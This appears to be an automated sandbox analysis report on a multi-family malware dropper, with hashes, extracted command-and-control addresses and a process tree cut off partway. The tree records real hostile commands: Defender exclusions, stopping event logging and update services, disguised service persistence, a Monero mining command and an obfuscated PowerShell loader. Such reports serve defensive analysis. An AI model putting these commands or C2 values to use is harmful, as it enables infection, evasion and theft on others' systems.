Overview

overview

10

Static

static

3

4363463463...63.exe

windows10-1703-x64

10

New Text D...od.exe

windows10-1703-x64

10

New Text D...od.exe

windows10-1703-x64

10

Resubmissions

25-06-2024 11:24

240625-nhwp5swhja 10

25-06-2024 11:22

240625-ngzemszcrm 3

24-06-2024 00:56

240624-bamq2s1gma 10

23-06-2024 11:27

240623-nkejmsygnf 8

23-06-2024 11:15

240623-nchw4ayflh 10

23-06-2024 11:08

240623-m81w4syerb 10

23-06-2024 11:08

240623-m8qq5ssfpn 3

22-05-2024 09:14

240522-k7dzvaad9z 10

21-05-2024 10:21

240521-mdy42aaa2x 10

21-05-2024 10:18

240521-mcbx4shg72 10

Analysis

  • max time kernel
    150s
  • max time network
    1803s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24-06-2024 00:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score
10/10
amadeygh0stratloaderbotlummaredlineriseproxmrigamac43c2ddiscoveryevasionexecutioninfostealerloaderminerpersistenceratspywarestealerthemidatrojanupx

Malware Config

Extracted

Family

amadey

Version

4.31

Botnet

c43c2d

C2

http://o7labs.top

Attributes
  • install_dir

    28feeece5c

  • install_file

    Hkbsse.exe

  • strings_key

    db4823e211dffb31faf4fc1fd90d3289

  • url_paths

    /online/support/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

loaderbot

C2

https://cv99160.tw1.ru/cmd.php

Extracted

Family

risepro

C2

77.91.77.66:58709

Extracted

Family

lumma

C2

https://disappointcredisotw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Gh0st RAT payload 7 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

    ratgh0strat
  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

    stealerlumma
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

    stealerrisepro
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • LoaderBot executable 2 IoCs
  • XMRig Miner payload 11 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

    Run Powershell and hide display window.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • UPX packed file 22 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 17 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:192
      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
        "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3620
        • C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe
          "C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:3532
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:2784
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:2732
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:4768
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:4540
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "xjuumoinznsp"
            5⤵
            • Launches sc.exe
            PID:4560
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
            5⤵
            • Launches sc.exe
            PID:5048
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            5⤵
            • Launches sc.exe
            PID:4972
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "xjuumoinznsp"
            5⤵
            • Launches sc.exe
            PID:3704
    • C:\Users\Admin\AppData\Local\Temp\a\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Users\Admin\AppData\Local\Temp\setup-efb63c8260d5d45b\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\setup-efb63c8260d5d45b\setup.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:4620
        • C:\Windows\system32\winsvc.exe
          "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-efb63c8260d5d45b\setup.exe"
          4⤵
          • Executes dropped EXE
          PID:5072
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:9072
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
              6⤵
              • Launches sc.exe
              PID:2412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:5428
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
              6⤵
              • Launches sc.exe
              PID:7892
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:660
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
              6⤵
              • Launches sc.exe
              PID:10140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:7700
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" start winsvc
              6⤵
              • Launches sc.exe
              PID:5936
    • C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe
      "C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        3⤵
          PID:2252
      • C:\Users\Admin\AppData\Local\Temp\a\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\a\ama.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
        • C:\Users\Admin\AppData\Local\Temp\6.exe
          "C:\Users\Admin\AppData\Local\Temp\6.exe"
          3⤵
          • Executes dropped EXE
          PID:7992
      • C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
        "C:\Users\Admin\AppData\Local\Temp\a\setup222.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
          SetupWizard.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3868
          • C:\Users\Admin\AppData\Local\Temp\SetupWizard-05b1525f32bc5566\SetupWizard.exe
            "C:\Users\Admin\AppData\Local\Temp\SetupWizard-05b1525f32bc5566\SetupWizard.exe"
            4⤵
            • Executes dropped EXE
            PID:2196
        • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
          SetupWizard.exe
          3⤵
            PID:5128
            • C:\Users\Admin\AppData\Local\Temp\SetupWizard-d6bcf6e35b011d64\SetupWizard.exe
              "C:\Users\Admin\AppData\Local\Temp\SetupWizard-d6bcf6e35b011d64\SetupWizard.exe"
              4⤵
                PID:13076
            • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
              SetupWizard.exe
              3⤵
                PID:20132
                • C:\Users\Admin\AppData\Local\Temp\SetupWizard-faaa44bc4cb019f1\SetupWizard.exe
                  "C:\Users\Admin\AppData\Local\Temp\SetupWizard-faaa44bc4cb019f1\SetupWizard.exe"
                  4⤵
                    PID:12652
                • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                  SetupWizard.exe
                  3⤵
                    PID:7116
                    • C:\Users\Admin\AppData\Local\Temp\SetupWizard-1cdb74005a4fe26a\SetupWizard.exe
                      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-1cdb74005a4fe26a\SetupWizard.exe"
                      4⤵
                        PID:14328
                    • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                      SetupWizard.exe
                      3⤵
                        PID:9164
                        • C:\Users\Admin\AppData\Local\Temp\SetupWizard-fea49c143adfa31e\SetupWizard.exe
                          "C:\Users\Admin\AppData\Local\Temp\SetupWizard-fea49c143adfa31e\SetupWizard.exe"
                          4⤵
                            PID:15288
                        • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                          SetupWizard.exe
                          3⤵
                            PID:10420
                            • C:\Users\Admin\AppData\Local\Temp\SetupWizard-477ac196fe97790c\SetupWizard.exe
                              "C:\Users\Admin\AppData\Local\Temp\SetupWizard-477ac196fe97790c\SetupWizard.exe"
                              4⤵
                                PID:17296
                            • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
                              SetupWizard.exe
                              3⤵
                                PID:9500
                                • C:\Users\Admin\AppData\Local\Temp\SetupWizard-26481258dc2cd9e4\SetupWizard.exe
                                  "C:\Users\Admin\AppData\Local\Temp\SetupWizard-26481258dc2cd9e4\SetupWizard.exe"
                                  4⤵
                                    PID:11532
                              • C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
                                "C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe"
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:1444
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5012
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                  3⤵
                                    PID:10876
                                    • C:\Windows\system32\wusa.exe
                                      wusa /uninstall /kb:890830 /quiet /norestart
                                      4⤵
                                        PID:5888
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop UsoSvc
                                      3⤵
                                      • Launches sc.exe
                                      PID:10880
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      3⤵
                                      • Launches sc.exe
                                      PID:7132
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop wuauserv
                                      3⤵
                                      • Launches sc.exe
                                      PID:10956
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop bits
                                      3⤵
                                      • Launches sc.exe
                                      PID:6584
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop dosvc
                                      3⤵
                                      • Launches sc.exe
                                      PID:11048
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:11088
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:9752
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6528
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:7728
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe delete "WSNKISKT"
                                      3⤵
                                      • Launches sc.exe
                                      PID:8472
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                      3⤵
                                      • Launches sc.exe
                                      PID:4636
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop eventlog
                                      3⤵
                                      • Launches sc.exe
                                      PID:5616
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe start "WSNKISKT"
                                      3⤵
                                      • Launches sc.exe
                                      PID:9348
                                  • C:\Users\Admin\AppData\Local\Temp\a\pic1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\a\pic1.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:696
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                      3⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1124
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
                                        rolex.exe -priverdD
                                        4⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:2068
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
                                          5⤵
                                          • Drops startup file
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:4988
                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4496
                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
                                            6⤵
                                              PID:7544
                                    • C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:3472
                                      • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
                                        "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:420
                                    • C:\Users\Admin\AppData\Local\Temp\a\pic15.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\pic15.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:900
                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        3⤵
                                          PID:7968
                                      • C:\Users\Admin\AppData\Local\Temp\a\limba.exe
                                        "C:\Users\Admin\AppData\Local\Temp\a\limba.exe"
                                        2⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:2424
                                      • C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
                                        "C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1116
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
                                          3⤵
                                            PID:4724
                                        • C:\Users\Admin\AppData\Local\Temp\a\1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          PID:4340
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 512
                                            3⤵
                                            • Program crash
                                            PID:3128
                                        • C:\Users\Admin\AppData\Local\Temp\a\gui.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\gui.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:696
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1556
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                              4⤵
                                                PID:4624
                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:4664
                                        • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
                                          "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:5088
                                          • C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
                                            "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Enumerates connected drives
                                            • Checks processor information in registry
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1164
                                        • C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
                                          C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of WriteProcessMemory
                                          PID:3556
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            2⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1940
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            2⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4348
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            2⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:424
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            2⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4904
                                          • C:\Windows\explorer.exe
                                            explorer.exe
                                            2⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:404
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies registry class
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3768
                                        • C:\Windows\system32\browser_broker.exe
                                          C:\Windows\system32\browser_broker.exe -Embedding
                                          1⤵
                                          • Modifies Internet Explorer settings
                                          PID:4392
                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:7476
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          • Suspicious use of SetWindowsHookEx
                                          PID:6084
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies Internet Explorer settings
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of SetWindowsHookEx
                                          PID:10884
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies registry class
                                          PID:7112
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          PID:9708
                                        • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                          C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:10200
                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                            2⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Modifies data under HKEY_USERS
                                            PID:7260
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          PID:8140
                                        • C:\Windows\system32\winsvc.exe
                                          C:\Windows\system32\winsvc.exe
                                          1⤵
                                            PID:8828
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:7564
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:9004
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
